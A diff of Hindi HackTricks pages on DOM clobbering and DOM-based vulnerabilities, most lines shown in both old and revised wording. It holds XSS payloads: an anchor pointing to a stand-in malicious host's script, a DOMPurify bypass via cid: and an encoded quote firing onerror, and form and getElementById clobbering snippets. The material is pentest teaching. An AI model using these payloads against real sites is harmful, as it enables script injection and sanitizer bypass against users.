वेब पृष्ठ पर HTML को मनिपुलेट करने से `someObject` को एक DOM नोड से ओवरराइड किया जा सकता है, जिससे सुरक्षा संवैधानिकता उत्पन्न हो सकती है। उदाहरण के लिए, आप `someObject` को एक आपत्तिजनक स्क्रिप्ट की ओर इशारा करने वाले एंकर तत्व से बदल सकते हैं:
```html
<a id=someObject href=//malicious-website.com/malicious.js></a>
```
एक वंलरबल कोड में जैसे:
एक वंलरबल कोड में जैसे:
```html
<script>
window.onload = function(){
@ -101,9 +101,9 @@ document.body.appendChild(script);
```
यह विधि अनचाहे कोड को निष्पादित करने के लिए स्क्रिप्ट स्रोत का शोषण करती है।
**ट्रिक**: **`DOMPurify`** आपको **`cid:`** प्रोटोकॉल का उपयोग करने देता है, ज**डबल-कोट्स को URL-encode नहीं करता है**। इसका मतलब है कि आप **कोड को रनटाइम पर डीकोड करने वाला एक एन्कोडेड डबल-कोट** इंजेक्ट कर सकते हैं। इसलिए, कुछ इंजेक्ट करना जैसे **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** HTML एन्कोडेड `&quot;` को **रनटाइम पर डीकोड** कर देगा और **एट्रिब्यूट मान से बचने** के लिए **`onerror`** इवेंट बनाएगा।
**ट्रिक**: **`DOMPurify`** आपको **`cid:`** प्रोटोकॉल का उपयोग करने देता है, जिसमें **डबल-कोट्स को URL-encode नहीं किया जाता है**। इसका मतलब है कि आप **कोड को रनटाइम पर डीकोड करने वाले एक एन्कोडेड डबल-कोट को इंजेक्ट कर सकते हैं**। इसलिए, कुछ इंजेक्ट करना जैसे **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** HTML एन्कोडेड `&quot;` को **रनटाइम पर डीकोड करने** और **एट्रिब्यूट मान से बचने** के लिए **`onerror`** इवेंट बनाएगा।
एक और तकनीक **`form`** एलिमेंट का उपयोग करती है। कुछ क्लाइंट-साइड लाइब्रेरी नए बनाए गए फॉर्म एलिमेंट के विशेषताओं की जांच करती हैं उन्हें साफ करने के लिए। हालांकि, एक `input` को फॉर्म के अंदर `id=attributes` के साथ जोड़कर, आप वास्तव में एट्रिब्यूट्स प्रॉपर्टी को अधिलेखित कर देते हैं, जिससे सैनिटाइजर को वास्तविक एट्रिब्यूट्स तक पहुंचने से रोक देते हैं।
एक और तकनीक एक **`form`** तत्व का उपयोग करती है। कुछ क्लाइंट-साइड लाइब्रेरी नए बनाए गए फॉर्म तत्वों के विशेषताओं की जांच करती हैं उन्हें साफ करने के लिए। हालांकि, फॉर्म के अंदर `input` को `id=attributes` के साथ जोड़कर, आप वास्तव में एट्रिब्यूट्स प्रॉपर्टी को अधिलेखित कर देते हैं, जिससे सैनिटाइजर को वास्तविक एट्रिब्यूट्स तक पहुंचने से रोक देते हैं।
आप [**इस प्रकार के clobbering का उदाहरण इस CTF लेख में पा सकते हैं**](iframes-in-xss-and-csp.md#iframes-in-sop-2)।
@ -126,9 +126,9 @@ HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)
'object
```
## तत्व को अद्वितीय आईडी के साथ अद्वितीय एचटीएमएल या बॉडी टैग डालने के बाद लिखना
## तत्व को अद्वितीय आईडी के साथ अद्वितीय आईडी के साथ `<html>` या `<body>` टैग डालने के बाद लिखना
**`document.getElementById()`** और **`document.querySelector()`** के कॉल के परिणाम को एक अद्वितीय आईडी विशेषक के साथ `<html>` या `<body>` टैग इंजेक्ट करके बदला जा सकता है। यहाँ यह कैसे किया जा सकता है:
**`document.getElementById()`** और **`document.querySelector()`** के कॉल के परिणाम को एक अद्वितीय आईडी के साथ `<html>` या `<body>` टैग इंजेक्ट करके बदला जा सकता है। यहाँ देखें कि यह कैसे किया जा सकता है:
```html
<div style="display:none" id="cdnDomain" class="x">test</div>
<p>
@ -158,7 +158,7 @@ alert(document.getElementById('cdnDomain').innerText); // Clobbered
alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script>
```
चाहे वह Chrome हो या Firefox, SVG में HTML टैग कार्य करने के लिए, `<foreignobject>` टैग आवश्यक है:
चाहे वह Chrome हो या Firefox, SVG में HTML टैग कार्य करने के लिए `<foreignobject>` टैग आवश्यक है:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
@ -172,7 +172,7 @@ alert(document.getElementById('cdnDomain').innerText); // Clobbered
```
## Clobbering Forms
एक फॉर्म के अंदर **नए एंट्रीज जोड़ना संभव** है बस **कुछ टैग्स के अंदर `form` विशेषिता** को **निर्दिष्ट करके**। आप इसका उपयोग **फॉर्म के अंदर नए मान जोड़ने** और नए **बटन** भी **जोड़ सकते** हैं ताकि इसे **भेजा जा सके** (क्लिकजैकिंग या कुछ `.click()` JS कोड का दुरुपयोग करना):
यह संभव है कि **फ़ॉर्म के अंदर नए एंट्रीज़ जोड़ी जा सकती हैं** बस **कुछ टैग्स के अंदर `form` विशेषिता** को निर्दिष्ट करके। आप इसका उपयोग **फॉर्म के अंदर नए मान जोड़ने** और नए **बटन** भी जोड़ने के लिए कर सकते हैं **इसे भेजने के लिए** (क्लिकजैकिंग या कुछ `.click()` JS कोड का दुरुपयोग करना):
```html
<!--Add a new attribute and a new button to send-->
<textarea form=id-other-form name=info>
@ -196,10 +196,10 @@ Click to send!
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -7,22 +7,22 @@
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन करें**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में**
</details>
## DOM सुरक्षा दोष
DOM सुरक्षा दोष उस समय होते हैं जब हमलावर नियंत्रित **स्रोतों** से डेटा (जैसे `location.search`, `document.referrer`, या `document.cookie`) को असुरक्षित रूप से **सिंक** में स्थानांतरित किया जाता है। सिंक वे फ़ंक्शन या ऑब्जेक्ट होते हैं (जैसे `eval()`, `document.body.innerHTML`) जो यदि दुरुपयोगी डेटा दिया जाए तो हानिकारक सामग्री का निष्पादन या प्रदर्शन कर सकते हैं।
DOM सुरक्षा दोष उस समय होते हैं जब हमलावर नियंत्रित **स्रोतों** से डेटा (जैसे `location.search`, `document.referrer`, या `document.cookie`) को असुरक्षित रूप से **सिंक्स** में स्थानांतरित किया जाता है। सिंक्स वे फ़ंक्शन या ऑब्जेक्ट्स होते हैं (जैसे `eval()`, `document.body.innerHTML`) जो अगर दुरुपयोगी डेटा दिया जाए तो हानिकारक सामग्री का निष्पादन या प्रदर्शन कर सकते हैं।
- **स्रोत** वे इनपुट होते हैं जिन्हें हमलावार द्वारा नियंत्रित किया जा सकता है, जैसे URLs, कुकीज़, और वेब संदेश।
- **सिंक** वे संभावित खतरनाक अंत-बिंदु होते हैं जहाँ दुरुपयोगी डेटा नुकसानकारी प्रभावों में ले सकता है, जैसे स्क्रिप्ट निष्पादन।
- **स्रोत** हैं वह इनपुट्स जो हमलावर द्वारा बदला जा सकता है, जैसे URLs, कुकीज़, और वेब संदेश।
- **सिंक्स** वे संभावित खतरनाक अंत-बिंदु हैं जहाँ दुरुपयोगी डेटा नुकसानकारी प्रभावों में ले सकता है, जैसे स्क्रिप्ट निष्पादन।
जोखिम उत्पन्न होता है जब डेटा स्रोत से सिंक में सही मान्यता या स्वच्छिकरण के बिना बहता है, जिससे XSS जैसे हमले संभव होते हैं।
जोखिम उत्पन्न होता है जब डेटा स्रोत से सिंक्स में सही मान्यता या स्वच्छिकरण के बिना बहता है, जिससे XSS जैसे हमले संभव होते हैं।
{% hint style="info" %}
**आप** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) **में अद्यतित स्रोतों और सिंक की एक अधिक अद्यतित सूची पा सकते हैं**
**आप** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) **में अद्यतित स्रोतों और सिंक्स की एक अधिक अद्यतित सूची पा सकते हैं**
{% endhint %}
**सामान्य स्रोत:**
@ -76,11 +76,11 @@ Database
| [**क्लाइंट-साइड SQL इंजेक्शन**](dom-xss.md#client-side-sql-injection) | [**वेब-संदेश मैनिपुलेशन**](dom-xss.md#web-message-manipulation) | `history.replaceState()` | `WebSocket` |
| `executeSql()` | `postMessage()` | \`\` | \`\` |
**`innerHTML`** सिंक किसी भी आधुनिक ब्राउज़र पर `स्क्रिप्ट` तत्वों को स्वीकार नहीं करता है, न तो `svg onload` घटनाएँ फायर होंगी। इसका मतलब है कि आपको `img` या `iframe` जैसे विकल्प तत्वों का उपयोग करना होगा।
**`innerHTML`** सिंक किसी भी आधुनिक ब्राउज़र पर `script` तत्वों को स्वीकार नहीं करता, ना ही `svg onload` घटनाएँ चलेंगी। इसका मतलब है कि आपको `img` या `iframe` जैसे विकल्प तत्वों का उपयोग करना होगा।
इस प्रकार का XSS शायद **सबसे मुश्किल** होता है, क्योंकि आपको JS कोड के अंदर देखना होगा, देखना होगा कि क्या कोई वस्तु है जिसका आप **नियंत्रण** कर सकते हैं, और उस मामले में, यह देखना होगा कि क्या कोई **तरीका है** जिससे आप इसे अर्बिट्रेरी JS को निष्पादित करने के लिए दुरुपयोग कर सकते हैं।
इस प्रकार का XSS शायद **सबसे मुश्किल** होता है, क्योंकि आपको JS कोड के अंदर देखना होगा, देखना होगा कि क्या कोई वस्तु है जिसका **मूल्य आप नियंत्रित करते हैं**, और उस मामले में, यह देखना होगा कि क्या कोई **तरीका है** जिससे आप इसे अर्बिट्रेरी JS चला सकते हैं।
## इन्हें खोजने के लिए उपकरण
## इसे खोजने के लिए उपकरण
* [https://github.com/mozilla/eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized)
@ -92,7 +92,7 @@ Database
**DOM में ओपन रीडायरेक्ट सुरक्षा दोष** उस समय होता है जब एक स्क्रिप्ट डेटा लिखता है, जिसे एक हमलावर नियंत्रित कर सकता है, एक सिंक में जो डोमेन के बीच नेविगेशन प्रारंभ करने की क्षमता रखता है।
यह महत्वपूर्ण है कि अर्बिट्रेरी कोड को निष्पादित करना, जैसे कि **`javascript:alert(1)`**, संभव है अगर आपके पास नियंत्रण है URL के शुरुआत पर जहाँ पुनर्निर्देशन होता है।
यह महत्वपूर्ण है कि अर्बिट्रेरी कोड को निष्पादित करना, जैसे कि **`javascript:alert(1)`**, संभव है अगर आपके पास नियंत्रण है URL के पारंभ में जहाँ पुनर्निर्देशन होता है।
सिंक:
```javascript
@ -116,7 +116,7 @@ $.ajax()
स्रोत: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation)
DOM-आधारित कुकी-मैनिपुलेशन सुरक्षा दोष उत्पन्न होता है जब एक स्क्रिप्ट एक हमलावादी द्वारा नियंत्रित किया जा सकने वाला डेटा कुकी के मान में शामिल करता है। यह दोष अगर कुकी साइट के भीतर उपयोग किया जाता है तो वेबपेज के अप्रत्याशित व्यवहार की ओर ले जा सकता है। इसके अतिरिक्त, इसका शोषण किया जा सकता है ताकि यदि कुकी उपयोगकर्ता सत्रों को ट्रैक करने में शामिल है तो एक सत्र स्थापना हमला किया जा सकता है। इस दोष से संबंधित मुख्य सिंक है:
DOM-आधारित कुकी-मैनिपुलेशन सुरक्षा दोष उत्पन्न होता है जब एक स्क्रिप्ट एक हमलावादी द्वारा नियंत्रित किया जा सकने वाला डेटा कुकी के मान में शामिल करता है। यह दोष अगर कुकी साइट के भीतर उपयोग किया जाता है तो पृष्ठभूमि के अप्रत्याशित व्यवहार की ओर ले जा सकता है। इसके अतिरिक्त, इसका शोषण किया जा सकता है ताकि उपयोगकर्ता सत्रों का ट्रैकिंग करने में कुकी शामिल हो। इस दोष से संबंधित मुख्य सिंक है:
सिंक:
```javascript
@ -145,11 +145,11 @@ crypto.generateCRMFRequest()
From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation)
**दस्तावेज़-डोमेन मानिपुलेशन सुरक्षा गड़बड़ियाँ** उस समय होती हैं जब एक स्क्रिप्ट `document.domain` गुणसूत्र को उस डेटा का उपयोग करके सेट करता है जिस पर हमलावर का नियंत्रण हो सकता है।
**दस्तावेज़-डोमेन मानिपुलेशन सुरक्षा दोष** उस समय होते हैं जब एक स्क्रिप्ट `document.domain` गुणसूत्र को उस डेटा का उपयोग करके सेट करता है जिस पर हमलावर का नियंत्रण हो सकता है।
`document.domain` गुणसूत्र ब्राउज़र्स द्वारा **समान मूल सिद्धांत** के **प्रवर्तन** में एक **महत्वपूर्ण भूमिका** निभाता है। जब दो अलग-अलग मूलों से पृष्ठ अपने `document.domain` को **एक ही मान** पर सेट करते हैं, तो वे प्रतिबंधों के बिना परस्पर कार्रवाई कर सकते हैं। हालांकि, ब्राउज़र्स `document.domain` को सौंपने वाले मानों पर कुछ **सीमाएँ** लगाते हैं, वास्तविक पृष्ठ मूल को पूरी तरह से असंबंधित मानों का सौंपने से रोकते हुए, अपवाद होते हैं। सामान्यत: ब्राउज़र्स **बच्चे** या **माता-पिता डोमेन** का उपयोग करने की अनुमति देते हैं।
`document.domain` गुणसूत्र ब्राउज़र्स द्वारा **समान मूल सिद्धांत** के **प्रवर्तन** में एक **महत्वपूर्ण भूमिका** निभाता है। जब दो अलग-अलग मूलों से दो पृष्ठ अपने `document.domain` को **एक ही मान** पर सेट करते हैं, तो वे प्रतिबंधों के बिना परस्पर कार्रवाई कर सकते हैं। हालांकि, ब्राउज़र्स `document.domain` को देने योग्य मानों पर कुछ **सीमाएँ** लगाते हैं, वास्तविक पृष्ठ मूल को पूरी तरह से असंबंधित मानों का निर्धारण रोकते हैं, अपवाद हो सकते हैं। सामान्यत: ब्राउज़र्स **बच्चा** या **माता-पिता डोमेन** का उपयोग स्वीकार करते हैं।
Sinks:
सिंक्स:
```javascript
document.domain
```
@ -157,7 +157,7 @@ document.domain
From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
**WebSocket-URL poisoning** तब होता है जब एक स्क्रिप्ट **नियंत्रण योग्य डेटा का उपयोग करता है जैसे WebSocket कनेक्शन के लिए लक्षित URL**।
**WebSocket-URL poisoning** तब होता है जब एक स्क्रिप्ट **एक WebSocket कनेक्शन के लिए लक्षित URL के रूप में नियंत्रण योग्य डेटा का उपयोग** करता है
Sinks:
@ -167,7 +167,7 @@ Sinks:
From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
**DOM-based link-manipulation vulnerabilities** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रण योग्य डेटा को वर्तमान पृष्ठ में नेविगेशन लक्ष्य** के रूप में लिखता है, जैसे क्लिक करने योग्य लिंक या एक फॉर्म के सबमिशन URL।
**DOM-based link-manipulation vulnerabilities** उत्पन्न होती है जब एक स्क्रिप्ट **वर्तमान पृष्ठ में नेविगेशन लक्ष्य के लिए हमलावर-नियंत्रण योग्य डेटा को लिखता है**, जैसे क्लिक करने योग्य लिंक या एक फॉर्म के सबमिशन URL।
Sinks:
```javascript
@ -179,9 +179,9 @@ someDOMElement.action
From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
**एजेक्स अनुरोध मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **एक `XmlHttpRequest` ऑब्जेक्ट का उपयोग करते हुए जारी किया जाने वाले एजेक्स अनुरोध में हमलावाद-नियंत्रित डेटा लिखता है**।
**एजेक्स अनुरोध मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **एक्सएमएलएचटीपी ऑब्जेक्ट का उपयोग करते हुए जारी किया जाने वाले एजेक्स अनुरोध में हमलावाद-नियंत्रित डेटा लिखता है**।
Sinks:
सिंक्स:
```javascript
XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
@ -193,7 +193,7 @@ $.globalEval()
From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
**स्थानीय फ़ाइल-पथ मेनिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को एक फ़ाइल-हैंडलिंग API** के रूप में `filename` पैरामीटर के रूप में पारित करता है। एक हमलावर द्वारा इस सुरक्षा दोष का शोध किया जा सकता है ताकि वह एक URL का निर्माण कर सके जो, अगर दूसरे उपयोगकर्ता द्वारा देखा जाता है, तो उपयोगकर्ता के ब्राउज़र को एक विचित्र स्थानीय फ़ाइल खोलने या लिखने की ओर ले जा सकता है।
**स्थानीय फ़ाइल-पथ मेनिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को एक फ़ाइल-हैंडलिंग API के रूप में पास** करता है जैसे `filename` पैरामीटर. यह सुरक्षा दोष एक हमलावर द्वारा उत्पन्न किया जा सकता है ताकि वह एक URL का निर्माण कर सके जो, अगर किसी अन्य उपयोगकर्ता द्वारा देखा जाता है, तो उसे उपयोगकर्ता के ब्राउज़र को खोलने या एक विचित्र स्थानीय फ़ाइल में लेखन की ओर ले जा सकता है।
Sinks:
```javascript
@ -209,17 +209,17 @@ FileReader.root.getFile()
From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
**क्लाइंट-साइड एसक्यूएल इंजेक्शन सुरक्षा गंभीरता** उस समय होती है जब एक स्क्रिप्ट **एक असुरक्षित तरीके से एक क्लाइंट-साइड एसक्यूएल क्वेरी में हमलावर-नियंत्रित डेटा शामिल करता है**
**क्लाइंट-साइड एसक्यूएल-इंजेक्शन सुरक्षा दोष** उस समय होता है जब एक स्क्रिप्ट **एक असुरक्षित तरीके से एक क्लाइंट-साइड एसक्यूएल क्वेरी में हमलावर-नियंत्रित डेटा शामिल करता है**
Sinks:
```javascript
executeSql()
```
### HTML5-संग्रहण में परिवर्त
### HTML5-संग्रहन संशोध
From: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation)
**HTML5-संग्रहण में परिवर्तन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावादी-नियंत्रित डेटा को वेब ब्राउज़र के HTML5 संग्रहण** (`localStorage` या `sessionStorage`) में संग्रहित करता है। यह कार्रवाई स्वत: में एक सुरक्षा दोष नहीं है, लेकिन यह समस्यात्मक हो जाता है अगर एप्लिकेशन उस संग्रहित डेटा को फिर से पढ़ता है और असुरक्षित रूप से प्रसंस्करण करता है। यह एक हमलावादी को स्टोरेज तंत्र का उपयोग करके अन्य DOM-आधारित हमलों को करने की अनुमति देता है, जैसे क्रॉस-साइट स्क्रिप्टिंग और जावास्क्रिप्ट इन्जेक्शन।
**HTML5-संग्रहन संशोधन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावादी-नियंत्रित डेटा को वेब ब्राउज़र के HTML5 संग्रह में संग्रहित** करता है (`localStorage` या `sessionStorage`). यह कार्रवाई स्वतः में एक सुरक्षा दोष नहीं है, लेकिन यह समस्यात्मक हो जाता है अगर एप्लिकेशन उस संग्रहित डेटा को फिर से पढ़ता है और असुरक्षित रूप से प्रसंस्करण करता है। यह एक हमलावादी को स्टोरेज तंत्र का उपयोग करके अन्य DOM-आधारित हमलों को करने की अनुमति देता है, जैसे क्रॉस-साइट स्क्रिप्टिंग और जावास्क्रिप्ट इन्जेक्शन।
Sinks:
```javascript
@ -241,7 +241,7 @@ someDOMElement.evaluate()
From: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection)
**DOM-आधारित JSON-इन्जेक्शन सुरक्षा दोष** उस समय होते हैं जब एक स्क्रिप्ट **एक स्ट्रिंग में एकत्रित किया जाने वाला डेटा शामिल करता है जो एक JSON डेटा संरचना के रूप में पार्स किया जाता है और फिर एप्लिकेशन द्वारा प्रोसेस किया जाता है**।
**DOM-आधारित JSON-इन्जेक्शन सुरक्षा दोष** उस समय होते हैं जब एक स्क्रिप्ट **एक स्ट्रिंग में एकत्रित किया जाने वाला डेटा शामिल करता है जो एक JSON डेटा संरचना के रूप में विश्लेषित किया जाता है और फिर एप्लिकेशन द्वारा प्रसंस्कृत किया जाता है**.
Sinks:
```javascript
@ -253,17 +253,17 @@ $.parseJSON()
From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
**वेब-संदेश सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट अटैकर-नियंत्रित डेटा को एक वेब संदेश के रूप में अन्य दस्तावेज़ में भेजता है जो ब्राउज़र के अंदर होता है। एक उदाहरण वेब-संदेश मानिपुलेशन का [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source) पर मिल सकता है।
**वेब-संदेश सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट अपने द्वारा नियंत्रित किए गए डेटा को एक अन्य दस्तावेज़ में वेब संदेश के रूप में भेजता है जो ब्राउज़र के अंदर होता है। एक उदाहरण वेब-संदेश मानिपुलेशन का [PortSwigger's Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source) पर मिल सकता है।
Sinks:
`postMessage()` वेब संदेश भेजने के लिए विधि एक सुरक्षा दोष के लिए ले जा सकती है अगर संयोजक संदेश प्राप्त करने के लिए घटना सुनने वाले उपकरण ने आने वाले डेटा को एक असुरक्षित तरीके से संभाला।
`postMessage()` वेब संदेश भेजने के लिए विधि एक सुरक्षा दोष की ओर ले जा सकती है अगर संयोजक संदेश प्राप्त करने के लिए घटना सुनने वाले डेटा को एक असुरक्षित तरीके से संभाल है
### DOM-डेटा मानिपुलेशन
From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
**DOM-डेटा मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट एक फ़ील्ड में अटैकर-नियंत्रित डेटा लिखता है जो दृश्यमान UI या क्लाइंट-साइड तर्क में उपयोग किया जाता है। इस सुरक्षा दोष का शिकार होने पर एक हमलावर द्वारा एक URL को उपयोग करके एक ऐसा निर्माण किया जा सकता है जो, अगर दूसरे उपयोगकर्ता द्वारा देखा जाता है, तो क्लाइंट-साइड UI की उपस्थिति या व्यवहार को बदल सकता है।
**DOM-डेटा मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट डोम के भीतर एक क्षेत्र में **हमलावर-नियंत्रित डेटा लिखता है** जो दृश्यमान यूआई या क्लाइंट-साइड तर्क में उपयोग किया जाता है। एक हमलावर इस सुरक्षा दोष का शिकार बना सकता है ताकि वह एक URL बना सके जिसे अगर किसी अन्य उपयोगकर्ता द्वारा देखा जाता है, तो वह क्लाइंट-साइड यूआई की दिखावट या व्यवहार को बदल सकता है।
Sinks:
```javascript
@ -294,7 +294,7 @@ history.replaceState()
From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
**DOM-आधारित सेवा की इनकार वंश्यताएं** उत्पन्न होती हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को एक समस्यात्मक प्लेटफ़ॉर्म API में सुरक्षित रूप से पारित** करता है। इसमें वह API शामिल हैं जो, जब आह्वानित किया जाता है, तो उपयोगकर्ता के कंप्यूटर को **अत्यधिक मात्रा में CPU या डिस्क स्थान** का उपभोग करने की ओर ले जा सकते हैं। ऐसी भयानक दोषाएं हो सकती हैं, जैसे ब्राउज़र जो वेबसाइट की कार्यक्षमता को प्रतिबंधित करके `localStorage` में डेटा संग्रहित करने के प्रयासों को अस्वीकार करने या व्यस्त स्क्रिप्टों को समाप्त करके।
**DOM-आधारित सेवा की इनकार वंश्यताएं** उस समय होती हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को समस्यात्मक प्लेटफ़ॉर्म API में सुरक्षित ढंग से पारित** करता है। इसमें वह API शामिल हैं जो, जब आह्वानित किया जाता है, तो उपयोगकर्ता कंप्यूटर को **अत्यधिक मात्रा में CPU या डिस्क स्थान** का उपभोग करने की ओर ले जा सकते हैं। ऐसी वंश्यताएं महत्वपूर्ण परिणाम देने की क्षमता रखती हैं, जैसे ब्राउज़र जो वेबसाइट की कार्यक्षमता को प्रतिबंधित करके `localStorage` में डेटा संग्रहित करने की कोशिशों को अस्वीकार करने या व्यस्त स्क्रिप्टों को समाप्त करके।
Sinks:
```javascript
@ -311,10 +311,10 @@ RegExp()
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
